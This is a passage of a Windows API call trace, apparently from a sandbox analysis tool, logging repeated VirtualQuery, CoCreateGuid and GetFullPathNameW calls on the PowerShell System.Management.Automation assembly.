Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.576] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x8bd575a1, Data2=0x29f3, Data3=0x4fcc, Data4=([0]=0xba, [1]=0x8f, [2]=0x51, [3]=0x12, [4]=0xde, [5]=0x6c, [6]=0xf6, [7]=0xc1))) returned 0x0 [0135.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xbebc1d59, Data2=0x9ac, Data3=0x48a7, Data4=([0]=0x8b, [1]=0xc2, [2]=0x3e, [3]=0x84, [4]=0x78, [5]=0xde, [6]=0xd4, [7]=0xbd))) returned 0x0 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.579] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.579] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.580] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.581] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.581] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.582] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] VirtualQuery (in: lpAddress=0xcb170, lpBuffer=0xcc030, dwLength=0x30 | out: lpBuffer=0xcc030*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.583] VirtualQuery (in: lpAddress=0xcb200, lpBuffer=0xcc0c0, dwLength=0x30 | out: lpBuffer=0xcc0c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb880, lpFilePart=0x0 | out: 